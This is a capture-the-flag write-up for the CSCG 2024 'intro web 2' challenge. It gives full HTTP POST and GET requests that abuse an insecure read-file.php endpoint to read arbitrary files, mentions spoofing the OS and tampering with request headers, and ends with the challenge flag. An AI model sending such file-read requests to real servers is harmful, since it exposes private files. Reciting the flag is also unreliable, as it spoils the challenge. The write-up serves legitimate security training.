Files
ctf/2024/cscg/web/intro_web_2/notes.md
2025-06-06 03:13:31 +02:00

58 lines
2.3 KiB
Markdown

### 1.Part
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
### 2. Part
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
Sending the following request:
```http
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
content-length: 17
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
filename=flag.txt
```
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
### 3. Part
A similar bug can be used with a GET request to get the content of the flag.txt file.
This time we use a faulty php file called read-file.php
```http
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
content-length: 0
```
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
### 4.Part
We now have to intercept a request made and change the authority information.
When we do this we get the fourth part of the flag.
### flag
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}